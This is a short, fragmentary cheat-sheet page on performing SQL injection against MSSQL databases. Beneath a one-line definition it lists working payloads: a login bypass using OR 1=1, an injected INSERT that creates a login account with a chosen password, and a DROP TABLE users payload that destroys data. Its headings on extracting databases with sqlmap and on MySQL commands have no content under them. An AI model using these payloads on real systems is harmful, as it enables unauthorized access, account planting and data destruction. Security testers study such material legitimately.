1. Perform SQL Injection attacks
SQL injection attacks are performed on SQL databases with weak codes that do not adequately filter, use strong typing, or correctly execute user input.
1. SQL Injection on MSSQL Database
'OR 1=1 -- Admin'; Insert into login values('john','apple123');-- //adding entry
blah'; DROP TABLE users; --2. Extract MSSQL Database with SQL MAP
MySQL commands
Last updated




